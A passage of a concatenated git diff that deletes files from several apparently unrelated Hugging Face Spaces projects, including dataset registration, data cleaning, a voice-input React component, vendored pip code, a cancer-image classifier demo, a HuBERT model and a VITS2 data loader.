- image_file = os.path.join(image_dir, os.path.splitext(ann["file_name"])[0] + ".jpg") - label_file = os.path.join(gt_dir, ann["file_name"]) - sem_label_file = os.path.join(semseg_dir, ann["file_name"]) - segments_info = [_convert_category_id(x, meta) for x in ann["segments_info"]] - ret.append( - { - "file_name": image_file, - "image_id": image_id, - "pan_seg_file_name": label_file, - "sem_seg_file_name": sem_label_file, - "segments_info": segments_info, - "annotations": instance_data_dicts[image_id]["annotations"], - } - ) - assert len(ret), f"No images found in {image_dir}!" - assert PathManager.isfile(ret[0]["file_name"]), ret[0]["file_name"] - assert PathManager.isfile(ret[0]["pan_seg_file_name"]), ret[0]["pan_seg_file_name"] - assert PathManager.isfile(ret[0]["sem_seg_file_name"]), ret[0]["sem_seg_file_name"] - return ret - - -def register_coco_panoptic_annos_sem_seg( - name, metadata, image_root, panoptic_root, panoptic_json, sem_seg_root, instances_json, instances_name, -): - panoptic_name = name - delattr(MetadataCatalog.get(panoptic_name), "thing_classes") - delattr(MetadataCatalog.get(panoptic_name), "thing_colors") - MetadataCatalog.get(panoptic_name).set( - thing_classes=metadata["thing_classes"], - thing_colors=metadata["thing_colors"], - # thing_dataset_id_to_contiguous_id=metadata["thing_dataset_id_to_contiguous_id"], - ) - - # the name is "coco_2017_train_panoptic_with_sem_seg" and "coco_2017_val_panoptic_with_sem_seg" - semantic_name = name + "_with_sem_seg" - DatasetCatalog.register( - semantic_name, - lambda: load_coco_panoptic_json(panoptic_json, instances_json, instances_name, image_root, panoptic_root, sem_seg_root, metadata), - ) - MetadataCatalog.get(semantic_name).set( - sem_seg_root=sem_seg_root, - panoptic_root=panoptic_root, - image_root=image_root, - panoptic_json=panoptic_json, - json_file=instances_json, - evaluator_type="coco_panoptic_seg", - ignore_label=255, - label_divisor=1000, - **metadata, - ) - - -def register_all_coco_panoptic_annos_sem_seg(root): - for ( - prefix, - (panoptic_root, panoptic_json, semantic_root), - ) in _PREDEFINED_SPLITS_COCO_PANOPTIC.items(): - - prefix_instances = prefix[: -len("_panoptic")] - instances_meta = MetadataCatalog.get(prefix_instances) - image_root, instances_json = instances_meta.image_root, instances_meta.json_file - - if 'val' in instances_json: - instances_json = instances_json.replace('instances_', 'panoptic2instances_') - - register_coco_panoptic_annos_sem_seg( - prefix, - get_metadata(), - image_root, - os.path.join(root, panoptic_root), - os.path.join(root, panoptic_json), - os.path.join(root, semantic_root), - instances_json, - prefix_instances, - ) - - -_root = os.getenv("DETECTRON2_DATASETS", "datasets") -register_all_coco_panoptic_annos_sem_seg(_root) diff --git a/spaces/TBF/AutomaticDatavisualization/data_clean.py b/spaces/TBF/AutomaticDatavisualization/data_clean.py deleted file mode 100644 index ab1544c1c06e4f6d68060d3b47e59326ebfde375..0000000000000000000000000000000000000000 --- a/spaces/TBF/AutomaticDatavisualization/data_clean.py +++ /dev/null @@ -1,242 +0,0 @@ -# from cv2 import dft -import pandas as pd -import numpy as np -from sklearn.impute import KNNImputer -import streamlit as st - -# def remove_col(df ,i): -# df.drop([i], axis = 1,inplace = True) -# return df - -# def column_delete(df, column_name): -# print("deleting the column: ", column_name) -# # new_df = (df.drop['column_name'], axis=1) -# del df[column_name] -# df.head() -# return df - -# def row_delete(df, row_number): -# 
print("deleting the row number: ", row_number) -# df.drop(df.index[row_number]) -# df.head() -# return df - -# def mean_fill(df,column_name): -# mean_value=df[column_name].mean() -# filled = df[column_name].fillna(value=mean_value, inplace=True) -# return filled - -# def median_fill(df,column_name): -# median_value=df[column_name].median() -# filled = df[column_name].fillna(value=median_value, inplace=True) -# return filled - -# def random_fill(df): -# for i in df.columns: -# df[i+"_imputed"] = df[i] -# df[i+"_imputed"][df[i+"_imputed"].isnull()] = df[i].dropna().sample(df[i].isnull().sum()).values - -# def EndDistribution(df, column_name): - -# mean = df[column_name].mean() -# std = df[column_name].std() -# #calculating extreme standard deviation -# extreme = (mean + (3*std)) -# df[column_name+'_median'] = df[column_name].fillna(df[column_name].median()) -# df[column_name+'_end_distribution'] = df[column_name].fillna(extreme) -# return df - -# #knn imputer - - -# def impute_knn(df): -# ''' -# function for knn imputation in missing values in the data -# df - dataset provided by the users -# ''' -# from sklearn.impute import KNNImputer -# imputer =KNNImputer(n_neighbors=5) - -# #finding only numeric columns -# cols_num = df.select_dtypes(include=np.number).columns -# for feature in df.columns: -# #for numeric type -# if feature in cols_num: -# df[feature] = pd.DataFrame(imputer.fit_transform(np.array(df[feature]).reshape(-1, 1))) -# else: -# #for categorical type -# df[feature] = df[feature].fillna(df[feature].mode().iloc[0]) -# return df - -# #Z score capping -# def zScore(df): -# cols_num = df.select_dtypes(include=np.number).columns -# for i in cols_num: -# max_threshold = df[i].mean() + 3*df[i].std() -# min_threshold = df[i].mean() - 3*df[i].std() -# # df = df[(df['cgpa'] > 8.80) | (df['cgpa'] < 5.11)] -# df[i] = np.where( -# df[i]>max_threshold, -# max_threshold, -# np.where( -# df[i] min_threshold)] -# return df - -# # Ourlier using Percentile -# # trimming -# def percentile_trimming(df): -# cols_num = df.select_dtypes(include=np.number).columns -# for i in cols_num: -# percentile25 = df[i].quantile(0.25) -# percentile75 = df[i].quantile(0.75) -# iqr = percentile75 - percentile25 -# max_threshold = percentile75 + 3*iqr -# min_threshold = percentile25 - 3*iqr -# df = df[(df[i] < max_threshold) | (df[i] > min_threshold)] -# return df - -# #capping -# def percentile_capping(df): -# cols_num = df.select_dtypes(include=np.number).columns -# for i in cols_num: -# percentile25 = df[i].quantile(0.25) -# percentile75 = df[i].quantile(0.75) -# iqr = percentile75 - percentile25 -# max_threshold = percentile75 + 3*iqr -# min_threshold = percentile25 - 3*iqr -# df[i] = np.where( -# df[i]>max_threshold, -# max_threshold, -# np.where( -# df[i] 1: -# for i in range(len(price_cols)): -# df.rename(columns={price_cols[i]: 'price_'+str(i+1)}, inplace=True) -# elif len(price_cols) == 1: -# df.rename(columns={price_cols[0]: 'price'}, inplace=True) -# return df - - -# def data_cleaning(df): -# import pandas as pd -# import numpy as np -# from sklearn.impute import KNNImputer -# pd.set_option('display.max_rows', 100) -# for i in df.columns: -# if ((df[i].isna().sum())/df.shape[0]) > 0.95: -# df = remove_col(df,i) -# else: -# df = df.copy() -# df = impute_knn(df) -# return df - - -# class missing_df: -# def __init__(self, df): -# self.df = df -# print(self.df) -#functions for handling missing values - -class missing_df: - def __init__ (self,dataset): - self.dataset = dataset - -def handle_missing_value(): - 
df = pd.read_csv("temp_data/test.csv") - missing_count = df.isnull().sum().sum() - if missing_count != 0: - print(f"Found total of {missing_count} missing values.") - - #remove column having name starts with Unnamed - df =df.loc[:,~df.columns.str.startswith('Unnamed')] - - #drop columns having more than 90% missing values - for i in df.columns.to_list(): - if df[f"{i}"].isna().mean().round(4) > 0.9: - df = df.drop(i, axis=1) - - #converting object datatype to integer if present - for j in df.columns.values.tolist(): # Iterate on columns of dataframe - try: - df[j] = df[j].astype('int') # Convert datatype from object to int, of columns having all integer values - except: - pass - - - # find date column in dataframe and convert it to datetime format - try: - df = df.apply(lambda col: pd.to_datetime(col, errors='ignore') if col.dtypes == object else col, axis=0) - except: - pass - - #impute missing values - imputer = KNNImputer(n_neighbors=3) - #finding numerical columns from dataset - cols_num = df.select_dtypes(include=np.number).columns - for feature in df.columns: - #for numeric type - if feature in cols_num: - df[feature] = pd.DataFrame(imputer.fit_transform(np.array(df[feature]).reshape(-1, 1))) - else: - #for categorical type - df[feature] = df[feature].fillna(df[feature].mode().iloc[0]) - - # def add_binary_col(df): - # """ - # Functions to add binary column which tells if the data was missing or not - # """ - # for label, content in df.items(): - # if pd.isnull(content).sum(): - # df["ismissing_"+label] = pd.isnull(content) - # return df - st.write(df) - return df - - - diff --git a/spaces/TEnngal/bingo/src/components/voice.tsx b/spaces/TEnngal/bingo/src/components/voice.tsx deleted file mode 100644 index ab886394487445e4b0675770b76096bba0e61b0e..0000000000000000000000000000000000000000 --- a/spaces/TEnngal/bingo/src/components/voice.tsx +++ /dev/null @@ -1,52 +0,0 @@ -import React, { useEffect } from 'react' -import { useSetAtom } from 'jotai' -import { useBing } from '@/lib/hooks/use-bing' -import Image from 'next/image' -import VoiceIcon from '@/assets/images/voice.svg' -import VoiceButton from './ui/voice' -import { SR } from '@/lib/bots/bing/sr' -import { voiceListenAtom } from '@/state' - -const sr = new SR(['发送', '清空', '退出']) - -const Voice = ({ setInput, input, sendMessage, isSpeaking }: Pick, 'setInput' | 'sendMessage' | 'input' | 'isSpeaking'>) => { - const setListen = useSetAtom(voiceListenAtom) - useEffect(() => { - if (sr.listening) return - sr.transcript = !isSpeaking - }, [isSpeaking]) - - useEffect(() => { - sr.onchange = (msg: string, command?: string) => { - switch (command) { - case '退出': - sr.stop() - break; - case '发送': - sendMessage(input) - case '清空': - setInput('') - break; - default: - setInput(input + msg) - } - } - }, [input, setInput, sendMessage]) - - const switchSR = (enable: boolean = false) => { - setListen(enable) - if (enable) { - sr.start() - } else { - sr.stop() - } - } - - return sr.listening ? 
( - switchSR(false)} /> - ) : ( - start voice switchSR(true)} /> - ) -}; - -export default Voice; diff --git a/spaces/TandCAcceptMe/face-swap-docker/mynewshinyroop/Lib/site-packages/pip/_internal/metadata/pkg_resources.py b/spaces/TandCAcceptMe/face-swap-docker/mynewshinyroop/Lib/site-packages/pip/_internal/metadata/pkg_resources.py deleted file mode 100644 index f330ef12a2c5ea0a4adbecbeea389741479d5eb4..0000000000000000000000000000000000000000 --- a/spaces/TandCAcceptMe/face-swap-docker/mynewshinyroop/Lib/site-packages/pip/_internal/metadata/pkg_resources.py +++ /dev/null @@ -1,270 +0,0 @@ -import email.message -import email.parser -import logging -import os -import zipfile -from typing import Collection, Iterable, Iterator, List, Mapping, NamedTuple, Optional - -from pip._vendor import pkg_resources -from pip._vendor.packaging.requirements import Requirement -from pip._vendor.packaging.utils import NormalizedName, canonicalize_name -from pip._vendor.packaging.version import parse as parse_version - -from pip._internal.exceptions import InvalidWheel, NoneMetadataError, UnsupportedWheel -from pip._internal.utils.egg_link import egg_link_path_from_location -from pip._internal.utils.misc import display_path, normalize_path -from pip._internal.utils.wheel import parse_wheel, read_wheel_metadata_file - -from .base import ( - BaseDistribution, - BaseEntryPoint, - BaseEnvironment, - DistributionVersion, - InfoPath, - Wheel, -) - -logger = logging.getLogger(__name__) - - -class EntryPoint(NamedTuple): - name: str - value: str - group: str - - -class InMemoryMetadata: - """IMetadataProvider that reads metadata files from a dictionary. - - This also maps metadata decoding exceptions to our internal exception type. - """ - - def __init__(self, metadata: Mapping[str, bytes], wheel_name: str) -> None: - self._metadata = metadata - self._wheel_name = wheel_name - - def has_metadata(self, name: str) -> bool: - return name in self._metadata - - def get_metadata(self, name: str) -> str: - try: - return self._metadata[name].decode() - except UnicodeDecodeError as e: - # Augment the default error with the origin of the file. - raise UnsupportedWheel( - f"Error decoding metadata for {self._wheel_name}: {e} in {name} file" - ) - - def get_metadata_lines(self, name: str) -> Iterable[str]: - return pkg_resources.yield_lines(self.get_metadata(name)) - - def metadata_isdir(self, name: str) -> bool: - return False - - def metadata_listdir(self, name: str) -> List[str]: - return [] - - def run_script(self, script_name: str, namespace: str) -> None: - pass - - -class Distribution(BaseDistribution): - def __init__(self, dist: pkg_resources.Distribution) -> None: - self._dist = dist - - @classmethod - def from_directory(cls, directory: str) -> BaseDistribution: - dist_dir = directory.rstrip(os.sep) - - # Build a PathMetadata object, from path to metadata. :wink: - base_dir, dist_dir_name = os.path.split(dist_dir) - metadata = pkg_resources.PathMetadata(base_dir, dist_dir) - - # Determine the correct Distribution object type. 
- if dist_dir.endswith(".egg-info"): - dist_cls = pkg_resources.Distribution - dist_name = os.path.splitext(dist_dir_name)[0] - else: - assert dist_dir.endswith(".dist-info") - dist_cls = pkg_resources.DistInfoDistribution - dist_name = os.path.splitext(dist_dir_name)[0].split("-")[0] - - dist = dist_cls(base_dir, project_name=dist_name, metadata=metadata) - return cls(dist) - - @classmethod - def from_metadata_file_contents( - cls, - metadata_contents: bytes, - filename: str, - project_name: str, - ) -> BaseDistribution: - metadata_dict = { - "METADATA": metadata_contents, - } - dist = pkg_resources.DistInfoDistribution( - location=filename, - metadata=InMemoryMetadata(metadata_dict, filename), - project_name=project_name, - ) - return cls(dist) - - @classmethod - def from_wheel(cls, wheel: Wheel, name: str) -> BaseDistribution: - try: - with wheel.as_zipfile() as zf: - info_dir, _ = parse_wheel(zf, name) - metadata_dict = { - path.split("/", 1)[-1]: read_wheel_metadata_file(zf, path) - for path in zf.namelist() - if path.startswith(f"{info_dir}/") - } - except zipfile.BadZipFile as e: - raise InvalidWheel(wheel.location, name) from e - except UnsupportedWheel as e: - raise UnsupportedWheel(f"{name} has an invalid wheel, {e}") - dist = pkg_resources.DistInfoDistribution( - location=wheel.location, - metadata=InMemoryMetadata(metadata_dict, wheel.location), - project_name=name, - ) - return cls(dist) - - @property - def location(self) -> Optional[str]: - return self._dist.location - - @property - def installed_location(self) -> Optional[str]: - egg_link = egg_link_path_from_location(self.raw_name) - if egg_link: - location = egg_link - elif self.location: - location = self.location - else: - return None - return normalize_path(location) - - @property - def info_location(self) -> Optional[str]: - return self._dist.egg_info - - @property - def installed_by_distutils(self) -> bool: - # A distutils-installed distribution is provided by FileMetadata. This - # provider has a "path" attribute not present anywhere else. Not the - # best introspection logic, but pip has been doing this for a long time. - try: - return bool(self._dist._provider.path) - except AttributeError: - return False - - @property - def canonical_name(self) -> NormalizedName: - return canonicalize_name(self._dist.project_name) - - @property - def version(self) -> DistributionVersion: - return parse_version(self._dist.version) - - def is_file(self, path: InfoPath) -> bool: - return self._dist.has_metadata(str(path)) - - def iter_distutils_script_names(self) -> Iterator[str]: - yield from self._dist.metadata_listdir("scripts") - - def read_text(self, path: InfoPath) -> str: - name = str(path) - if not self._dist.has_metadata(name): - raise FileNotFoundError(name) - content = self._dist.get_metadata(name) - if content is None: - raise NoneMetadataError(self, name) - return content - - def iter_entry_points(self) -> Iterable[BaseEntryPoint]: - for group, entries in self._dist.get_entry_map().items(): - for name, entry_point in entries.items(): - name, _, value = str(entry_point).partition("=") - yield EntryPoint(name=name.strip(), value=value.strip(), group=group) - - def _metadata_impl(self) -> email.message.Message: - """ - :raises NoneMetadataError: if the distribution reports `has_metadata()` - True but `get_metadata()` returns None. 
- """ - if isinstance(self._dist, pkg_resources.DistInfoDistribution): - metadata_name = "METADATA" - else: - metadata_name = "PKG-INFO" - try: - metadata = self.read_text(metadata_name) - except FileNotFoundError: - if self.location: - displaying_path = display_path(self.location) - else: - displaying_path = repr(self.location) - logger.warning("No metadata found in %s", displaying_path) - metadata = "" - feed_parser = email.parser.FeedParser() - feed_parser.feed(metadata) - return feed_parser.close() - - def iter_dependencies(self, extras: Collection[str] = ()) -> Iterable[Requirement]: - if extras: # pkg_resources raises on invalid extras, so we sanitize. - extras = frozenset(extras).intersection(self._dist.extras) - return self._dist.requires(extras) - - def iter_provided_extras(self) -> Iterable[str]: - return self._dist.extras - - -class Environment(BaseEnvironment): - def __init__(self, ws: pkg_resources.WorkingSet) -> None: - self._ws = ws - - @classmethod - def default(cls) -> BaseEnvironment: - return cls(pkg_resources.working_set) - - @classmethod - def from_paths(cls, paths: Optional[List[str]]) -> BaseEnvironment: - return cls(pkg_resources.WorkingSet(paths)) - - def _iter_distributions(self) -> Iterator[BaseDistribution]: - for dist in self._ws: - yield Distribution(dist) - - def _search_distribution(self, name: str) -> Optional[BaseDistribution]: - """Find a distribution matching the ``name`` in the environment. - - This searches from *all* distributions available in the environment, to - match the behavior of ``pkg_resources.get_distribution()``. - """ - canonical_name = canonicalize_name(name) - for dist in self.iter_all_distributions(): - if dist.canonical_name == canonical_name: - return dist - return None - - def get_distribution(self, name: str) -> Optional[BaseDistribution]: - # Search the distribution by looking through the working set. - dist = self._search_distribution(name) - if dist: - return dist - - # If distribution could not be found, call working_set.require to - # update the working set, and try to find the distribution again. - # This might happen for e.g. when you install a package twice, once - # using setup.py develop and again using setup.py install. Now when - # running pip uninstall twice, the package gets removed from the - # working set in the first uninstall, so we have to populate the - # working set again so that pip knows about it and the packages gets - # picked up and is successfully uninstalled the second time too. - try: - # We didn't pass in any version specifiers, so this can never - # raise pkg_resources.VersionConflict. 
- self._ws.require(name) - except pkg_resources.DistributionNotFound: - return None - return self._search_distribution(name) diff --git a/spaces/TandCAcceptMe/face-swap-docker/mynewshinyroop/Lib/site-packages/setuptools/_distutils/_macos_compat.py b/spaces/TandCAcceptMe/face-swap-docker/mynewshinyroop/Lib/site-packages/setuptools/_distutils/_macos_compat.py deleted file mode 100644 index 17769e9154bd9cc3f3c00dc10718e4377828cb5e..0000000000000000000000000000000000000000 --- a/spaces/TandCAcceptMe/face-swap-docker/mynewshinyroop/Lib/site-packages/setuptools/_distutils/_macos_compat.py +++ /dev/null @@ -1,12 +0,0 @@ -import sys -import importlib - - -def bypass_compiler_fixup(cmd, args): - return cmd - - -if sys.platform == 'darwin': - compiler_fixup = importlib.import_module('_osx_support').compiler_fixup -else: - compiler_fixup = bypass_compiler_fixup diff --git a/spaces/ThirdEyeData/Entity-Extraction/entity.md b/spaces/ThirdEyeData/Entity-Extraction/entity.md deleted file mode 100644 index 095f9aa91d93634d9c5468ac811ef30c8134cb8f..0000000000000000000000000000000000000000 --- a/spaces/ThirdEyeData/Entity-Extraction/entity.md +++ /dev/null @@ -1,22 +0,0 @@ -ENTITY CODES - -Entity Code | What does it mean? -------------- | ------------- -PERSON | People, including fictional. -NORP | Nationalities or religious or political groups. -FAC | Buildings, airports, highways, bridges, etc. -ORG | Companies, agencies, institutions, etc. -GPE | Countries, cities, states. -LOC | Non-GPE locations, mountain ranges, bodies of water. -PRODUCT | Objects, vehicles, foods, etc. (Not services.) -EVENT | Named hurricanes, battles, wars, sports events, etc. -WORK_OF_ART | Titles of books, songs, etc. -LAW | Named documents made into laws. -LANGUAGE | Any named language. -DATE | Absolute or relative dates or periods. -TIME | Times smaller than a day. -PERCENT | Percentage, including "%". -MONEY | Monetary values, including unit. -QUANTITY | Measurements, as of weight or distance. -ORDINAL | "first", "second", etc. -CARDINAL | Numerals that do not fall under another type. \ No newline at end of file diff --git a/spaces/Tirendaz/Cancer-Detection/app.py b/spaces/Tirendaz/Cancer-Detection/app.py deleted file mode 100644 index a6a8dd0d02804381ade80c5f8e67e3baa8887543..0000000000000000000000000000000000000000 --- a/spaces/Tirendaz/Cancer-Detection/app.py +++ /dev/null @@ -1,47 +0,0 @@ -import torch -from torch import nn -from torchvision import transforms -from torchvision.models import resnet50, ResNet50_Weights -import gradio as gr - -title = "Cancer Detection" -description = "Image classification with histopathologic images" -article = "

Github Repo
" - -# The model architecture -class ImageClassifier(nn.Module): - def __init__(self): - super().__init__() - self.pretrain_model = resnet50(weights=ResNet50_Weights.DEFAULT) - self.pretrain_model.eval() - for param in self.pretrain_model.parameters(): - param.requires_grad = False - self.pretrain_model.fc = nn.Sequential( - nn.Linear(self.pretrain_model.fc.in_features, 1024), - nn.ReLU(), - nn.Dropout(), - nn.Linear(1024,2) - ) - def forward(self, input): - output=self.pretrain_model(input) - return output - -model = ImageClassifier() -model.load_state_dict(torch.load('model-data_comet-torch-model.pth')) - -def predict(inp): - image_transform = transforms.Compose([ transforms.Resize(size=(224,224)), transforms.ToTensor()]) - labels = ['normal', 'cancer'] - inp = image_transform(inp).unsqueeze(dim=0) - with torch.no_grad(): - prediction = torch.nn.functional.softmax(model(inp)) - confidences = {labels[i]: float(prediction.squeeze()[i]) for i in range(len(labels))} - return confidences - -gr.Interface(fn=predict, - inputs=gr.Image(type="pil"), - outputs=gr.Label(num_top_classes=2), - title=title, - description=description, - article=article, - examples=['image-1.jpg', 'image-2.jpg']).launch() \ No newline at end of file diff --git a/spaces/Vegecken/sovits4dzl/hubert/hubert_model.py b/spaces/Vegecken/sovits4dzl/hubert/hubert_model.py deleted file mode 100644 index 7fb642d89b07ca60792debab18e3454f52d8f357..0000000000000000000000000000000000000000 --- a/spaces/Vegecken/sovits4dzl/hubert/hubert_model.py +++ /dev/null @@ -1,222 +0,0 @@ -import copy -import random -from typing import Optional, Tuple - -import torch -import torch.nn as nn -import torch.nn.functional as t_func -from torch.nn.modules.utils import consume_prefix_in_state_dict_if_present - - -class Hubert(nn.Module): - def __init__(self, num_label_embeddings: int = 100, mask: bool = True): - super().__init__() - self._mask = mask - self.feature_extractor = FeatureExtractor() - self.feature_projection = FeatureProjection() - self.positional_embedding = PositionalConvEmbedding() - self.norm = nn.LayerNorm(768) - self.dropout = nn.Dropout(0.1) - self.encoder = TransformerEncoder( - nn.TransformerEncoderLayer( - 768, 12, 3072, activation="gelu", batch_first=True - ), - 12, - ) - self.proj = nn.Linear(768, 256) - - self.masked_spec_embed = nn.Parameter(torch.FloatTensor(768).uniform_()) - self.label_embedding = nn.Embedding(num_label_embeddings, 256) - - def mask(self, x: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]: - mask = None - if self.training and self._mask: - mask = _compute_mask((x.size(0), x.size(1)), 0.8, 10, x.device, 2) - x[mask] = self.masked_spec_embed.to(x.dtype) - return x, mask - - def encode( - self, x: torch.Tensor, layer: Optional[int] = None - ) -> Tuple[torch.Tensor, torch.Tensor]: - x = self.feature_extractor(x) - x = self.feature_projection(x.transpose(1, 2)) - x, mask = self.mask(x) - x = x + self.positional_embedding(x) - x = self.dropout(self.norm(x)) - x = self.encoder(x, output_layer=layer) - return x, mask - - def logits(self, x: torch.Tensor) -> torch.Tensor: - logits = torch.cosine_similarity( - x.unsqueeze(2), - self.label_embedding.weight.unsqueeze(0).unsqueeze(0), - dim=-1, - ) - return logits / 0.1 - - def forward(self, x: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]: - x, mask = self.encode(x) - x = self.proj(x) - logits = self.logits(x) - return logits, mask - - -class HubertSoft(Hubert): - def __init__(self): - super().__init__() - - @torch.inference_mode() - def units(self, wav: 
torch.Tensor) -> torch.Tensor: - wav = t_func.pad(wav, ((400 - 320) // 2, (400 - 320) // 2)) - x, _ = self.encode(wav) - return self.proj(x) - - -class FeatureExtractor(nn.Module): - def __init__(self): - super().__init__() - self.conv0 = nn.Conv1d(1, 512, 10, 5, bias=False) - self.norm0 = nn.GroupNorm(512, 512) - self.conv1 = nn.Conv1d(512, 512, 3, 2, bias=False) - self.conv2 = nn.Conv1d(512, 512, 3, 2, bias=False) - self.conv3 = nn.Conv1d(512, 512, 3, 2, bias=False) - self.conv4 = nn.Conv1d(512, 512, 3, 2, bias=False) - self.conv5 = nn.Conv1d(512, 512, 2, 2, bias=False) - self.conv6 = nn.Conv1d(512, 512, 2, 2, bias=False) - - def forward(self, x: torch.Tensor) -> torch.Tensor: - x = t_func.gelu(self.norm0(self.conv0(x))) - x = t_func.gelu(self.conv1(x)) - x = t_func.gelu(self.conv2(x)) - x = t_func.gelu(self.conv3(x)) - x = t_func.gelu(self.conv4(x)) - x = t_func.gelu(self.conv5(x)) - x = t_func.gelu(self.conv6(x)) - return x - - -class FeatureProjection(nn.Module): - def __init__(self): - super().__init__() - self.norm = nn.LayerNorm(512) - self.projection = nn.Linear(512, 768) - self.dropout = nn.Dropout(0.1) - - def forward(self, x: torch.Tensor) -> torch.Tensor: - x = self.norm(x) - x = self.projection(x) - x = self.dropout(x) - return x - - -class PositionalConvEmbedding(nn.Module): - def __init__(self): - super().__init__() - self.conv = nn.Conv1d( - 768, - 768, - kernel_size=128, - padding=128 // 2, - groups=16, - ) - self.conv = nn.utils.weight_norm(self.conv, name="weight", dim=2) - - def forward(self, x: torch.Tensor) -> torch.Tensor: - x = self.conv(x.transpose(1, 2)) - x = t_func.gelu(x[:, :, :-1]) - return x.transpose(1, 2) - - -class TransformerEncoder(nn.Module): - def __init__( - self, encoder_layer: nn.TransformerEncoderLayer, num_layers: int - ) -> None: - super(TransformerEncoder, self).__init__() - self.layers = nn.ModuleList( - [copy.deepcopy(encoder_layer) for _ in range(num_layers)] - ) - self.num_layers = num_layers - - def forward( - self, - src: torch.Tensor, - mask: torch.Tensor = None, - src_key_padding_mask: torch.Tensor = None, - output_layer: Optional[int] = None, - ) -> torch.Tensor: - output = src - for layer in self.layers[:output_layer]: - output = layer( - output, src_mask=mask, src_key_padding_mask=src_key_padding_mask - ) - return output - - -def _compute_mask( - shape: Tuple[int, int], - mask_prob: float, - mask_length: int, - device: torch.device, - min_masks: int = 0, -) -> torch.Tensor: - batch_size, sequence_length = shape - - if mask_length < 1: - raise ValueError("`mask_length` has to be bigger than 0.") - - if mask_length > sequence_length: - raise ValueError( - f"`mask_length` has to be smaller than `sequence_length`, but got `mask_length`: {mask_length} and `sequence_length`: {sequence_length}`" - ) - - # compute number of masked spans in batch - num_masked_spans = int(mask_prob * sequence_length / mask_length + random.random()) - num_masked_spans = max(num_masked_spans, min_masks) - - # make sure num masked indices <= sequence_length - if num_masked_spans * mask_length > sequence_length: - num_masked_spans = sequence_length // mask_length - - # SpecAugment mask to fill - mask = torch.zeros((batch_size, sequence_length), device=device, dtype=torch.bool) - - # uniform distribution to sample from, make sure that offset samples are < sequence_length - uniform_dist = torch.ones( - (batch_size, sequence_length - (mask_length - 1)), device=device - ) - - # get random indices to mask - mask_indices = torch.multinomial(uniform_dist, 
num_masked_spans) - - # expand masked indices to masked spans - mask_indices = ( - mask_indices.unsqueeze(dim=-1) - .expand((batch_size, num_masked_spans, mask_length)) - .reshape(batch_size, num_masked_spans * mask_length) - ) - offsets = ( - torch.arange(mask_length, device=device)[None, None, :] - .expand((batch_size, num_masked_spans, mask_length)) - .reshape(batch_size, num_masked_spans * mask_length) - ) - mask_idxs = mask_indices + offsets - - # scatter indices to mask - mask = mask.scatter(1, mask_idxs, True) - - return mask - - -def hubert_soft( - path: str, -) -> HubertSoft: - r"""HuBERT-Soft from `"A Comparison of Discrete and Soft Speech Units for Improved Voice Conversion"`. - Args: - path (str): path of a pretrained model - """ - hubert = HubertSoft() - checkpoint = torch.load(path) - consume_prefix_in_state_dict_if_present(checkpoint, "module.") - hubert.load_state_dict(checkpoint) - hubert.eval() - return hubert diff --git a/spaces/Vision-CAIR/minigpt4/minigpt4/processors/base_processor.py b/spaces/Vision-CAIR/minigpt4/minigpt4/processors/base_processor.py deleted file mode 100644 index b4c9d86859270a046623661a632587f2b3136b46..0000000000000000000000000000000000000000 --- a/spaces/Vision-CAIR/minigpt4/minigpt4/processors/base_processor.py +++ /dev/null @@ -1,26 +0,0 @@ -""" - Copyright (c) 2022, salesforce.com, inc. - All rights reserved. - SPDX-License-Identifier: BSD-3-Clause - For full license text, see the LICENSE file in the repo root or https://opensource.org/licenses/BSD-3-Clause -""" - -from omegaconf import OmegaConf - - -class BaseProcessor: - def __init__(self): - self.transform = lambda x: x - return - - def __call__(self, item): - return self.transform(item) - - @classmethod - def from_config(cls, cfg=None): - return cls() - - def build(self, **kwargs): - cfg = OmegaConf.create(kwargs) - - return self.from_config(cfg) diff --git a/spaces/XzJosh/Ava-Bert-VITS2/data_utils.py b/spaces/XzJosh/Ava-Bert-VITS2/data_utils.py deleted file mode 100644 index be3a29a93188c5b3386f22e5db29e5e96d78109a..0000000000000000000000000000000000000000 --- a/spaces/XzJosh/Ava-Bert-VITS2/data_utils.py +++ /dev/null @@ -1,321 +0,0 @@ -import time -import os -import random -import numpy as np -import torch -import torch.utils.data -import commons -from mel_processing import spectrogram_torch, mel_spectrogram_torch, spec_to_mel_torch -from utils import load_wav_to_torch, load_filepaths_and_text -from text import cleaned_text_to_sequence, get_bert - -"""Multi speaker version""" - - -class TextAudioSpeakerLoader(torch.utils.data.Dataset): - """ - 1) loads audio, speaker_id, text pairs - 2) normalizes text and converts them to sequences of integers - 3) computes spectrograms from audio files. 
- """ - - def __init__(self, audiopaths_sid_text, hparams): - self.audiopaths_sid_text = load_filepaths_and_text(audiopaths_sid_text) - self.max_wav_value = hparams.max_wav_value - self.sampling_rate = hparams.sampling_rate - self.filter_length = hparams.filter_length - self.hop_length = hparams.hop_length - self.win_length = hparams.win_length - self.sampling_rate = hparams.sampling_rate - self.spk_map = hparams.spk2id - self.hparams = hparams - - self.use_mel_spec_posterior = getattr(hparams, "use_mel_posterior_encoder", False) - if self.use_mel_spec_posterior: - self.n_mel_channels = getattr(hparams, "n_mel_channels", 80) - - self.cleaned_text = getattr(hparams, "cleaned_text", False) - - self.add_blank = hparams.add_blank - self.min_text_len = getattr(hparams, "min_text_len", 1) - self.max_text_len = getattr(hparams, "max_text_len", 300) - - random.seed(1234) - random.shuffle(self.audiopaths_sid_text) - self._filter() - - def _filter(self): - """ - Filter text & store spec lengths - """ - # Store spectrogram lengths for Bucketing - # wav_length ~= file_size / (wav_channels * Bytes per dim) = file_size / (1 * 2) - # spec_length = wav_length // hop_length - - audiopaths_sid_text_new = [] - lengths = [] - skipped = 0 - for _id, spk, language, text, phones, tone, word2ph in self.audiopaths_sid_text: - audiopath = f'{_id}' - if self.min_text_len <= len(phones) and len(phones) <= self.max_text_len: - phones = phones.split(" ") - tone = [int(i) for i in tone.split(" ")] - word2ph = [int(i) for i in word2ph.split(" ")] - audiopaths_sid_text_new.append([audiopath, spk, language, text, phones, tone, word2ph]) - lengths.append(os.path.getsize(audiopath) // (2 * self.hop_length)) - else: - skipped += 1 - print("skipped: ", skipped, ", total: ", len(self.audiopaths_sid_text)) - self.audiopaths_sid_text = audiopaths_sid_text_new - self.lengths = lengths - - def get_audio_text_speaker_pair(self, audiopath_sid_text): - # separate filename, speaker_id and text - audiopath, sid, language, text, phones, tone, word2ph = audiopath_sid_text - - bert, phones, tone, language = self.get_text(text, word2ph, phones, tone, language, audiopath) - - spec, wav = self.get_audio(audiopath) - sid = torch.LongTensor([int(self.spk_map[sid])]) - return (phones, spec, wav, sid, tone, language, bert) - - def get_audio(self, filename): - audio, sampling_rate = 